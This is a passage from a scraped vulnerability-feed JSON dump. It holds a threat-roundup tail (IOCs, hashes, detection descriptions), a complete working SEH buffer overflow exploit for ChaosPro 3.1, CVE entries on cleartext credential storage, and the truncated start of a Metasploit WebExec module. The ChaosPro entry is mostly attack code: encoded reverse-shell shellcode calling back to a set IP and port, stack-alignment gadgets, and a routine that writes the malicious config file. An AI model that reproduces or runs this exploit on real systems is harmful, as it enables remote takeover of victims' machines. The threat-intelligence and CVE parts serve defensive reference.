\n`197[.]254[.]253[.]254` | 8 \n`66[.]44[.]141[.]253` | 8 \n`183[.]254[.]253[.]254` | 8 \n`158[.]254[.]253[.]254` | 8 \n`204[.]254[.]253[.]254` | 8 \n`230[.]254[.]253[.]254` | 8 \n`71[.]17[.]221[.]85` | 7 \n`217[.]209[.]16[.]149` | 7 \n`84[.]40[.]68[.]14` | 7 \n`75[.]64[.]4[.]243` | 7 \n`24[.]145[.]85[.]120` | 7 \n`83[.]233[.]106[.]6` | 7 \n`24[.]176[.]111[.]7` | 7 \n`24[.]92[.]71[.]93` | 7 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`\\systemroot\\assembly\\GAC_32\\Desktop.ini` | 8 \n`\\systemroot\\assembly\\GAC_64\\Desktop.ini` | 8 
\n`%System32%\\LogFiles\\Scm\\e22a8667-f75b-4ba9-ba46-067ed4429de8` | 8 \n`%SystemRoot%\\assembly\\GAC_32\\Desktop.ini` | 8 \n`%SystemRoot%\\assembly\\GAC_64\\Desktop.ini` | 8 \n`\\$Recycle.Bin\\S-1-5-18` | 8 \n`\\$Recycle.Bin\\S-1-5-18\\$0f210b532df043a6b654d5b43088f74f` | 8 \n`\\$Recycle.Bin\\S-1-5-18\\$0f210b532df043a6b654d5b43088f74f\\@` | 8 \n`\\$Recycle.Bin\\S-1-5-18\\$0f210b532df043a6b654d5b43088f74f\\L` | 8 \n`\\$Recycle.Bin\\S-1-5-18\\$0f210b532df043a6b654d5b43088f74f\\U` | 8 \n`\\$Recycle.Bin\\S-1-5-18\\$0f210b532df043a6b654d5b43088f74f\\n` | 8 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$0f210b532df043a6b654d5b43088f74f` | 8 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$0f210b532df043a6b654d5b43088f74f\\@` | 8 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$0f210b532df043a6b654d5b43088f74f\\L` | 8 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$0f210b532df043a6b654d5b43088f74f\\U` | 8 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$0f210b532df043a6b654d5b43088f74f\\n` | 8 \n`%ProgramFiles%\\Windows Defender\\MSASCui.exe:!` | 8 \n`%ProgramFiles%\\Windows Defender\\MpAsDesc.dll:!` | 8 \n`%ProgramFiles%\\Windows Defender\\MpClient.dll:!` | 8 \n`%ProgramFiles%\\Windows Defender\\MpCmdRun.exe:!` | 8 \n`%ProgramFiles%\\Windows Defender\\MpCommu.dll:!` | 8 \n`%ProgramFiles%\\Windows Defender\\MpEvMsg.dll:!` | 8 \n`%ProgramFiles%\\Windows Defender\\MpOAV.dll:!` | 8 \n`%ProgramFiles%\\Windows Defender\\MpRTP.dll:!` | 8 \n`%ProgramFiles%\\Windows Defender\\MpSvc.dll:!` | 8 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 1d2d42263d68f09b1946be33971dcc04706ccc597993007b59806c3a23f1ffac 4f59080cc3450aab4dbfae69f1223e79069e3c315bac2df45ea845a68439bcde 559ecb68cce08a6d1d5b27d96295fc81ddc3df2edf1dbf3d765a9831262402c5 907c8629bcd73adf85f6163bacf17831830f0410f7e9840a146b364fb0bb2945 9117e953fe785d1b5c2f350921bd8ec6e14f1e34c0a26059c66c4abfb98e7a55 
a026a103b42e4fd2a1b1b21931983d477e53b94210900f2a464cf71dd4868f27 b05d35fe02909b09b6a2c347f619430495530617f209ddba7b357db26cd154d1 d038daa7418565e12cd449a5c13d9f36eef7c3cf76c7739db4f41df68649837f e8a06267aade079e638ab09d0ca9b2697079be1292c237846f93bf802d9c8746 ec683faba46071aa2c11667714ee9d1abbbc1b4a6d6d024b77fc97e497eb5673 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-4lFJDJcAbnw/XcWXOsNexPI/AAAAAAAAC6E/Rqxlj5HTIx0eNcQRTj_FcSjvhL_0AFG_gCLcBGAsYHQ/s1600/a026a103b42e4fd2a1b1b21931983d477e53b94210900f2a464cf71dd4868f27_amp.png>)\n\n \n\n\n \n\n\n* * *\n\n## Exploit Prevention\n\nCisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities. \nCVE-2019-0708 detected \\- (47418) \n--- \nAn attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a heap memory corruption which can be triggered by sending a specially crafted Remote Desktop Protocol (RDP request). Since this vulnerability can be triggered without authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction. \nAtom Bombing code injection technique detected \\- (522) \nA process created a suspicious Atom, which is indicative of a known process injection technique called Atom Bombing. Atoms are Windows identifiers that associate a string with a 16-bit integer. 
These Atoms are accessible across processes when placed in the global Atom table. Malware exploits this by placing shell code as a global Atom, then accessing it through an Asynchronous Process Call (APC). A target process runs the APC function, which loads and runs the shellcode. The malware family Dridex is known to use Atom Bombing, but other threats may leverage it as well. \nProcess hollowing detected \\- (244) \nProcess hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead. \nKovter injection detected \\- (196) \nA process was injected into, most likely by an existing Kovter infection. Kovter is a click fraud Trojan that can also act as an information stealer. Kovter is also file-less malware meaning the malicious DLL is stored inside Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns. \nInstallcore adware detected \\- (99) \nInstall core is an installer which bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that display advertising in the form of popups or by injecting into browsers and adding or altering advertisements on webpages. Adware is known to sometimes download and install malware. \nExcessively long PowerShell command detected \\- (90) \nA PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. 
Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell based threats. \nGamarue malware detected \\- (89) \nGamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system. \nFusion adware detected \\- (43) \nFusion (or FusionPlayer) is an adware family that displays unwanted advertising in the form of popups or by injecting into browsers and altering advertisements on webpages. Adware is known to sometimes download and install malware. \nReverse http payload detected \\- (33) \nAn exploit payload intended to connect back to an attacker controlled host using http has been detected. \nDealply adware detected \\- (31) \nDealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware. 
\n \n", "modified": "2019-11-08T14:31:14", "published": "2019-11-08T14:31:14", "id": "TALOSBLOG:97F975C073505AE88655FF1C539740A6", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/C8d5TejfTdU/threat-roundup-1101-1108.html", "type": "talosblog", "title": "Threat Roundup for November 1 to November 8", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2019-12-04T23:56:43", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category local exploits", "modified": "2019-09-02T00:00:00", "published": "2019-09-02T00:00:00", "id": "1337DAY-ID-33189", "href": "https://0day.today/exploit/description/33189", "title": "ChaosPro 3.1 - SEH Buffer Overflow Exploit", "type": "zdt", "sourceData": "#!C:\\Python27\\python.exe\r\n\r\n# Title : ChaosPro 3.1\r\n# Twitter : @securitychops\r\n# Blog Post : https://securitychops.com/2019/08/24/retro-exploit-series-episode-one-chaospro-3-1.html\r\n\r\n# our egg!\r\npayload = \"T00WT00W\"\r\n\r\n# adjust the stack from 00F2FFA6 to 00F2FFA8\r\npayload += \"\\x83\\xC4\\x02\"\r\n\r\n#the payload\r\npayload += (\r\n# msfvenom -p windows/shell_reverse_tcp LHOST=10.0.7.17 \r\n# LPORT=4444 -e x86/alpha_upper -a x86 --platform windows -f c -b 
'\\x00'\r\n\"\\x89\\xe1\\xdb\\xd7\\xd9\\x71\\xf4\\x5e\\x56\\x59\\x49\\x49\\x49\\x49\\x43\"\r\n\"\\x43\\x43\\x43\\x43\\x43\\x51\\x5a\\x56\\x54\\x58\\x33\\x30\\x56\\x58\\x34\"\r\n\"\\x41\\x50\\x30\\x41\\x33\\x48\\x48\\x30\\x41\\x30\\x30\\x41\\x42\\x41\\x41\"\r\n\"\\x42\\x54\\x41\\x41\\x51\\x32\\x41\\x42\\x32\\x42\\x42\\x30\\x42\\x42\\x58\"\r\n\"\\x50\\x38\\x41\\x43\\x4a\\x4a\\x49\\x4b\\x4c\\x4b\\x58\\x4c\\x42\\x53\\x30\"\r\n\"\\x33\\x30\\x43\\x30\\x55\\x30\\x4b\\x39\\x4b\\x55\\x46\\x51\\x4f\\x30\\x32\"\r\n\"\\x44\\x4c\\x4b\\x56\\x30\\x56\\x50\\x4c\\x4b\\x46\\x32\\x54\\x4c\\x4c\\x4b\"\r\n\"\\x50\\x52\\x45\\x44\\x4c\\x4b\\x34\\x32\\x37\\x58\\x44\\x4f\\x4f\\x47\\x30\"\r\n\"\\x4a\\x36\\x46\\x30\\x31\\x4b\\x4f\\x4e\\x4c\\x47\\x4c\\x45\\x31\\x43\\x4c\"\r\n\"\\x44\\x42\\x56\\x4c\\x47\\x50\\x4f\\x31\\x58\\x4f\\x34\\x4d\\x45\\x51\\x39\"\r\n\"\\x57\\x4b\\x52\\x4c\\x32\\x56\\x32\\x31\\x47\\x4c\\x4b\\x46\\x32\\x32\\x30\"\r\n\"\\x4c\\x4b\\x50\\x4a\\x47\\x4c\\x4c\\x4b\\x30\\x4c\\x32\\x31\\x52\\x58\\x4b\"\r\n\"\\x53\\x31\\x58\\x53\\x31\\x4e\\x31\\x36\\x31\\x4c\\x4b\\x50\\x59\\x37\\x50\"\r\n\"\\x45\\x51\\x58\\x53\\x4c\\x4b\\x47\\x39\\x35\\x48\\x4d\\x33\\x37\\x4a\\x30\"\r\n\"\\x49\\x4c\\x4b\\x57\\x44\\x4c\\x4b\\x53\\x31\\x49\\x46\\x46\\x51\\x4b\\x4f\"\r\n\"\\x4e\\x4c\\x39\\x51\\x58\\x4f\\x54\\x4d\\x45\\x51\\x4f\\x37\\x36\\x58\\x4d\"\r\n\"\\x30\\x33\\x45\\x4a\\x56\\x43\\x33\\x43\\x4d\\x4c\\x38\\x57\\x4b\\x43\\x4d\"\r\n\"\\x56\\x44\\x42\\x55\\x5a\\x44\\x31\\x48\\x4c\\x4b\\x46\\x38\\x31\\x34\\x35\"\r\n\"\\x51\\x4e\\x33\\x35\\x36\\x4c\\x4b\\x34\\x4c\\x30\\x4b\\x4c\\x4b\\x56\\x38\"\r\n\"\\x45\\x4c\\x55\\x51\\x38\\x53\\x4c\\x4b\\x54\\x44\\x4c\\x4b\\x45\\x51\\x38\"\r\n\"\\x50\\x4d\\x59\\x51\\x54\\x46\\x44\\x56\\x44\\x31\\x4b\\x31\\x4b\\x43\\x51\"\r\n\"\\x31\\x49\\x50\\x5a\\x30\\x51\\x4b\\x4f\\x4b\\x50\\x51\\x4f\\x31\\x4f\\x51\"\r\n\"\\x4a\\x4c\\x4b\\x32\\x32\\x4a\\x4b\\x4c\\x4d\\x31\\x4d\\x42\\x48\\x47\\x43\"\r\n\"\\x57\\x42\\x53\\x30\\x55\\x50\\x35\\x38\\x53\\x47\\x43\\x43\\x30\\x32\\x31\"\
r\n\"\\x4f\\x31\\x44\\x33\\x58\\x30\\x4c\\x33\\x47\\x57\\x56\\x54\\x47\\x4b\\x4f\"\r\n\"\\x49\\x45\\x48\\x38\\x4a\\x30\\x35\\x51\\x43\\x30\\x35\\x50\\x56\\x49\\x59\"\r\n\"\\x54\\x36\\x34\\x36\\x30\\x52\\x48\\x56\\x49\\x4b\\x30\\x52\\x4b\\x35\\x50\"\r\n\"\\x4b\\x4f\\x59\\x45\\x30\\x50\\x56\\x30\\x56\\x30\\x46\\x30\\x51\\x50\\x36\"\r\n\"\\x30\\x57\\x30\\x46\\x30\\x55\\x38\\x4a\\x4a\\x54\\x4f\\x39\\x4f\\x4b\\x50\"\r\n\"\\x4b\\x4f\\x39\\x45\\x4d\\x47\\x42\\x4a\\x35\\x55\\x52\\x48\\x45\\x5a\\x53\"\r\n\"\\x30\\x33\\x37\\x34\\x51\\x52\\x48\\x45\\x52\\x53\\x30\\x54\\x51\\x31\\x4c\"\r\n\"\\x4d\\x59\\x5a\\x46\\x32\\x4a\\x52\\x30\\x50\\x56\\x46\\x37\\x32\\x48\\x5a\"\r\n\"\\x39\\x59\\x35\\x54\\x34\\x43\\x51\\x4b\\x4f\\x39\\x45\\x4d\\x55\\x49\\x50\"\r\n\"\\x33\\x44\\x44\\x4c\\x4b\\x4f\\x30\\x4e\\x44\\x48\\x43\\x45\\x5a\\x4c\\x35\"\r\n\"\\x38\\x4c\\x30\\x48\\x35\\x4f\\x52\\x36\\x36\\x4b\\x4f\\x49\\x45\\x55\\x38\"\r\n\"\\x52\\x43\\x52\\x4d\\x52\\x44\\x43\\x30\\x4b\\x39\\x4b\\x53\\x56\\x37\\x46\"\r\n\"\\x37\\x31\\x47\\x50\\x31\\x4a\\x56\\x33\\x5a\\x42\\x32\\x51\\x49\\x46\\x36\"\r\n\"\\x4b\\x52\\x4b\\x4d\\x53\\x56\\x4f\\x37\\x51\\x54\\x57\\x54\\x37\\x4c\\x53\"\r\n\"\\x31\\x43\\x31\\x4c\\x4d\\x50\\x44\\x31\\x34\\x34\\x50\\x58\\x46\\x55\\x50\"\r\n\"\\x30\\x44\\x31\\x44\\x30\\x50\\x30\\x56\\x50\\x56\\x50\\x56\\x30\\x46\\x36\"\r\n\"\\x36\\x50\\x4e\\x31\\x46\\x50\\x56\\x50\\x53\\x31\\x46\\x43\\x58\\x52\\x59\"\r\n\"\\x58\\x4c\\x47\\x4f\\x4b\\x36\\x4b\\x4f\\x49\\x45\\x4d\\x59\\x4d\\x30\\x50\"\r\n\"\\x4e\\x30\\x56\\x57\\x36\\x4b\\x4f\\x36\\x50\\x45\\x38\\x44\\x48\\x4c\\x47\"\r\n\"\\x35\\x4d\\x45\\x30\\x4b\\x4f\\x49\\x45\\x4f\\x4b\\x5a\\x50\\x48\\x35\\x59\"\r\n\"\\x32\\x30\\x56\\x42\\x48\\x4e\\x46\\x4a\\x35\\x4f\\x4d\\x4d\\x4d\\x4b\\x4f\"\r\n\"\\x4e\\x35\\x37\\x4c\\x54\\x46\\x53\\x4c\\x54\\x4a\\x4d\\x50\\x4b\\x4b\\x4b\"\r\n\"\\x50\\x52\\x55\\x33\\x35\\x4f\\x4b\\x31\\x57\\x54\\x53\\x54\\x32\\x32\\x4f\"\r\n\"\\x43\\x5a\\x33\\x30\\x31\\x43\\x4b\\x4f\\x4e\\x35\\x41\\x41\"\r\n)\r\n\r\n#badchars\r
\n#\\x0a\\x1a\\x3b\\x90\\x91\\x92\\x93\\x94\\x95\\x96\\x97\\x98\\x99\\x9a\r\n#\\x9b\\x9c\\x9d\\x9e\\x9f\\xa0\\xa1\\xa2\\xa3\\xa4\\xa5\\xa6\\xa7\\xa8\\xa9\r\n#\\xaa\\xab\\xac\\xad\\xae\\xaf\\xb0\\xb1\\xb2\\xb3\\xb4\\xb5\\xb6\\xb7\\xb8\r\n#\\xb9\\xba\\xbb\\xbc\\xbd\\xbe\\xbf\\xc0\\xc1\\xc2\\xc3\\xc4\\xc5\\xc6\\xc7\r\n#\\xc8\\xc9\\xca\\xcb\\xcc\\xcd\\xce\\xcf\\xd0\\xd1\\xd2\\xd3\\xd4\\xd5\\xd6\r\n#\\xd7\\xd8\\xd9\\xda\\xdb\\xdc\\xdd\\xde\\xdf\\xe0\\xe1\\xe2\\xe3\\xe4\\xe5\r\n#\\xe6\\xe7\\xe8\\xe9\\xea\\xeb\\xec\\xed\\xee\\xef\\xf0\\xf1\\xf2\\xf3\\xf4\r\n#\\xf5\\xf6\\xf7\\xf8\\xf9\\xfa\\xfb\\xfc\\xfd\\xfe\\xff\r\n\r\n# stack alignment\r\npop_esp = \"\\x5c\"\r\npop_eax = \"\\x58\"\r\npush_eax = \"\\x50\"\r\npush_esp = \"\\x54\"\r\nalign_stack = \"\\x2d\\x8f\\x8e\\x8d\\x8c\\x2d\\x7e\\x68\\x71\\x72\\x2d\\x01\\x01\\x01\\x01\"\r\nzero_eax = \"\\x25\\x7e\\x7e\\x05\\x7e\\x25\\x01\\x01\\x7a\\x01\"\r\n\r\n#this needs to be a backwards jump to give us room to call stack jump code\r\njmpback80 = \"\\x40\\x75\\x80\\x75\"\r\njmpforward06 = \"\\x40\\x75\\x06\\x75\"\r\n\r\n#line containing our payload\r\nline_start = \"Username \"\r\nline_start += payload + \"\\n\"\r\n\r\n#line with our overflow\r\nline_start += \"ProjectPath \"\r\njunk = line_start\r\n\r\n#the buffer starts being overwritten with\r\n# our controlled values at 522\r\njunk += \"A\" * 522\r\n\r\n#junk += alpha_numeric_hex\r\njunk += \"A\" * (1060 - 522 - 126 - 126 - 126 - len(jmpback80) - len(jmpforward06) - len(jmpforward06))\r\n#- 41 - 4 - 41 - 4 - 41 - 4 - 41 - 4- 41 - 4- 41 - 4- 41 - 4- 41 - 4- 41 - 4)\r\n\r\n# baby nopsled\r\njunk += \"A\" * 9\r\n\r\n# ok, lets start working stuff here ... we have 126 bytesish ... 
\r\njunk += zero_eax\r\njunk += push_esp + pop_eax # push esp, pop eax\r\njunk += align_stack\r\njunk += push_eax\r\njunk += pop_esp\r\n\r\n# first section into the stack\r\n# e7 ff e4 75\r\n# good \r\njunk += zero_eax \r\njunk += \"\\x2d\\x89\\x88\\x87\\x86\"\r\njunk += \"\\x2d\\x01\\x8f\\x77\\x8f\"\r\njunk += \"\\x2d\\x01\\x04\\x01\\x02\"\r\njunk += push_eax\r\n\r\n# second section into the stack\r\n# af e7 75 af\r\n# good\r\njunk += zero_eax \r\njunk += \"\\x2d\\x4f\\x4e\\x4d\\x4c\"\r\njunk += \"\\x2d\\x01\\x39\\x8f\\x02\"\r\njunk += \"\\x2d\\x01\\x03\\x3c\\x01\"\r\njunk += push_eax\r\n\r\n# third section into the stack\r\n# d7 89 57 30\r\n# good\r\njunk += zero_eax \r\njunk += \"\\x2d\\x8f\\x8e\\x74\\x73\"\r\njunk += \"\\x2d\\x3e\\x19\\x01\\x8f\"\r\njunk += \"\\x2d\\x03\\x01\\x01\\x26\"\r\njunk += push_eax\r\n\r\n# size for section one\r\njunk += \"A\" * (\r\n\t126\r\n\t- 9 # nopsled\r\n\t\r\n\t# aligning the stack\r\n\t- len(zero_eax) \r\n\t- len(push_esp) \r\n\t- len(pop_eax) \r\n\t- len(align_stack) \r\n\t- len(push_eax) \r\n\t- len(pop_esp) \r\n\t\r\n\t # first set of bytes going onto the stack\r\n\t- len(zero_eax)\r\n\t- 15 \r\n\t- len(push_eax)\r\n\t\r\n\t # second set of bytes going onto the stack\r\n\t- len(zero_eax)\r\n\t- 15\r\n\t- len(push_eax)\r\n\t\r\n\t # third set of bytes going onto the stack\r\n\t- len(zero_eax)\r\n\t- 15\r\n\t- len(push_eax)\t\t\t\r\n)\r\n\r\n# baby nopslep just for breathing room\r\njunk += \"AAAA\"\r\n# First Jump Backwards 0xFF - 0x80 bytes (0x7F or 127)\r\njunk += jmpforward06\r\njunk += jmpback80\r\n\r\n#Section Two\r\n\r\n# baby nopsled\r\njunk += \"AAA\" \r\n\r\n# fourth section into the stack part two\r\n# 30 54 b8 ec\r\n# fourth section into the stack part one\r\njunk += zero_eax \r\njunk += \"\\x2d\\x80\\x15\\x75\\x75\"\r\njunk += \"\\x2d\\x80\\x20\\x32\\x35\"\r\njunk += \"\\x2d\\x14\\x11\\x04\\x25\"\r\njunk += push_eax\r\n\r\n# fifth section into the stack\r\n# 74 5a 05 3c\r\n# good\r\njunk += zero_eax \r\njunk += 
\"\\x2d\\x8f\\x8e\\x8d\\x89\"\r\njunk += \"\\x2d\\x34\\x6b\\x17\\x01\"\r\njunk += \"\\x2d\\x01\\x01\\x01\\x01\"\r\njunk += push_eax\r\n\r\n# sixth section into the stack\r\n# 2e cd 58 53\r\n# good \r\njunk += zero_eax \r\njunk += \"\\x2d\\x8f\\x8e\\x8d\\x8c\"\r\njunk += \"\\x2d\\x1d\\x18\\x8e\\x43\"\r\njunk += \"\\x2d\\x01\\x01\\x17\\x01\"\r\njunk += push_eax\r\n\r\n# seventh section into the stack\r\n# 43 43 db 31\r\n# good\r\njunk += zero_eax \r\njunk += \"\\x2d\\x8f\\x8e\\x8d\\x8c\"\r\njunk += \"\\x2d\\x3e\\x7f\\x2d\\x2d\"\r\njunk += \"\\x2d\\x02\\x17\\x01\\x03\"\r\njunk += push_eax\r\n\r\njunk += \"A\" * (\r\n\t126 # amount of room before we need to jump\r\n\t\r\n\t- 3 # baby nopsled\r\n\t\r\n\t # part one of fourth set of bytes going onto the stack\r\n\t- len(zero_eax)\t\t\r\n\t\r\n\t# part two of fourth sec of bytes going onto the stack\r\n\t- 15\r\n\t- len(push_eax)\r\n\t\r\n\t # fifth set of bytes going onto the stack\r\n\t- len(zero_eax)\r\n\t- 15\r\n\t- len(push_eax)\r\n\t\r\n\t # sixth set of bytes going onto the stack\r\n\t- len(zero_eax)\r\n\t- 15\r\n\t- len(push_eax)\r\n\r\n\t # seventh set of bytes going onto the stack\r\n\t- len(zero_eax)\r\n\t- 15\r\n\t- len(push_eax)\t\r\n\t\r\n\t- 4 # baby nopsled\t\t\r\n\t- len(jmpback80)\r\n)\r\n\r\n# Second Jump Backwards 0xFF - 0x80 bytes (0x7F or 127)\r\njunk += jmpforward06\r\njunk += jmpback80\r\n\r\n# baby nopsled\r\njunk += \"AAAA\"\r\n\r\n# eighth section into the stack part two\r\n# 52 42 0f ff\r\n# good\r\n# eighth section into the stack part one\r\njunk += zero_eax \r\njunk += \"\\x2d\\x65\\x65\\x75\\x75\"\r\njunk += \"\\x2d\\x65\\x65\\x25\\x25\"\r\njunk += \"\\x2d\\x37\\x25\\x23\\x13\"\r\njunk += push_eax\r\n\r\n# ninth section into the stack\r\n# ca 81 66 43\r\n# good\r\njunk += zero_eax \r\njunk += \"\\x2d\\x8f\\x81\\x7c\\x7b\"\r\njunk += \"\\x2d\\x2d\\x17\\x01\\x8f\"\r\njunk += \"\\x2d\\x01\\x01\\x01\\x2b\"\r\njunk += push_eax\r\n\r\njunk += \"A\" * (\r\n\t126 # amount of room before we need to 
jump\r\n\t\r\n\t- len(jmpback80)\r\n\t\r\n\t- 4 # baby nopsled\r\n\r\n\t# eighth set of bytes going onto the stack\r\n\t# eighth section\r\n\t- len(zero_eax)\r\n\t- 15\r\n\t- len(push_eax)\t\r\n\t\r\n\t# ninth set of bytes going onto the stack\r\n\t- len(zero_eax)\r\n\t- 15\r\n\t- len(push_eax)\r\n\t\r\n\t- len(jmpforward06)\r\n)\r\n\r\n# First Jump Backwards 0xFF - 0x80 bytes (0x7F or 127)\r\njunk += jmpforward06\r\njunk += jmpback80\r\n\r\n#seh address for pop, pop and ret with a 0x00 at the end ... \r\njunk += \"\\x5d\\x10\\x40\"\r\n\r\n# write the evil file\r\nwith open('C:\\\\Program Files\\\\ChaosPro3.1\\\\ChaosPro.cfg', 'w') as the_file:\r\n the_file.write(junk)\n\n# 0day.today [2019-12-04] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/33189"}], "cve": [{"lastseen": "2019-10-04T12:26:03", "bulletinFamily": "NVD", "description": "Cleartext Storage of credentials in the iSmartAlarmData.xml configuration file in the iSmartAlarm application through 2.0.8 for Android allows an attacker to retrieve the username and password.", "modified": "2019-10-03T00:03:00", "id": "CVE-2018-16222", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-16222", "published": "2018-11-20T19:29:00", "title": "CVE-2018-16222", "type": "cve", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-10-04T12:26:03", "bulletinFamily": "NVD", "description": "Insecure Cryptographic Storage of credentials in com.vestiacom.qbeecamera_preferences.xml in the QBee Cam application through 1.0.5 for Android allows an attacker to retrieve the username and password.", "modified": "2019-10-03T00:03:00", "id": "CVE-2018-16223", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-16223", "published": "2018-11-20T19:29:00", "title": "CVE-2018-16223", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-10-04T12:25:50", "bulletinFamily": "NVD", "description": 
"An issue was discovered on D-Link DWR-116 through 1.06, DIR-140L through 1.02, DIR-640L through 1.02, DWR-512 through 2.02, DWR-712 through 2.02, DWR-912 through 2.02, DWR-921 through 2.02, and DWR-111 through 1.01 devices. The administrative password is stored in plaintext in the /tmp/csman/0 file. An attacker having a directory traversal (or LFI) can easily get full router access.", "modified": "2019-10-03T00:03:00", "id": "CVE-2018-10824", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-10824", "published": "2018-10-17T14:29:00", "title": "CVE-2018-10824", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-10-04T12:25:50", "bulletinFamily": "NVD", "description": "Synametrics SynaMan 4.0 build 1488 uses cleartext password storage for SMTP credentials.", "modified": "2019-10-03T00:03:00", "id": "CVE-2018-10814", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-10814", "published": "2018-09-14T21:29:00", "title": "CVE-2018-10814", "type": "cve", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-10-04T12:25:50", "bulletinFamily": "NVD", "description": "The Ericsson-LG iPECS NMS A.1Ac web application discloses sensitive information such as the NMS admin credentials and the PostgreSQL database credentials to logged-in users via the responses to certain HTTP POST requests. 
In order to be able to see the credentials in cleartext, an attacker needs to be authenticated.", "modified": "2019-10-03T00:03:00", "id": "CVE-2018-10286", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-10286", "published": "2018-04-22T13:29:00", "title": "CVE-2018-10286", "type": "cve", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}, {"lastseen": "2019-10-04T12:26:50", "bulletinFamily": "NVD", "description": "SickRage before v2018.03.09-1 includes cleartext credentials in HTTP responses.", "modified": "2019-10-03T00:03:00", "id": "CVE-2018-9160", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-9160", "published": "2018-03-31T21:29:00", "title": "CVE-2018-9160", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-10-04T12:26:28", "bulletinFamily": "NVD", "description": "An issue was discovered on D-Link DIR-601 B1 2.02NA devices. Being on the same local network as, but being unauthenticated to, the administrator's panel, a user can obtain the admin username and cleartext password in the response (specifically, the configuration file restore_default), which is displayed in XML.", "modified": "2019-10-03T00:03:00", "id": "CVE-2018-5708", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-5708", "published": "2018-03-30T21:29:00", "title": "CVE-2018-5708", "type": "cve", "cvss": {"score": 6.1, "vector": "AV:A/AC:L/Au:N/C:C/I:N/A:N"}}], "metasploit": [{"lastseen": "2019-10-19T11:34:49", "bulletinFamily": "exploit", "description": "This module uses a valid username and password of any level (or password hash) to execute an arbitrary payload. 
This module is similar to the \"psexec\" module, except allows any non-guest account by default.\n", "modified": "2018-10-24T14:46:00", "published": "2018-10-23T20:51:23", "id": "MSF:EXPLOIT/WINDOWS/SMB/WEBEXEC", "href": "", "type": "metasploit", "title": "WebExec Authenticated User Code Execution", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\n# Windows XP systems that are not part of a domain default to treating all\n# network logons as if they were Guest. This prevents SMB relay attacks from\n# gaining administrative access to these systems. This setting can be found\n# under:\n#\n# Local Security Settings >\n# Local Policies >\n# Security Options >\n# Network Access: Sharing and security model for local accounts\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ManualRanking\n\n include Msf::Exploit::CmdStager\n include Msf::Exploit::Remote::SMB::Client::WebExec\n include Msf::Exploit::Powershell\n include Msf::Exploit::EXE\n include Msf::Exploit::WbemExec\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'WebExec Authenticated User Code Execution',\n 'Description' => %q{\n This module uses a valid username and password of any level (or\n password hash) to execute an arbitrary payload. 
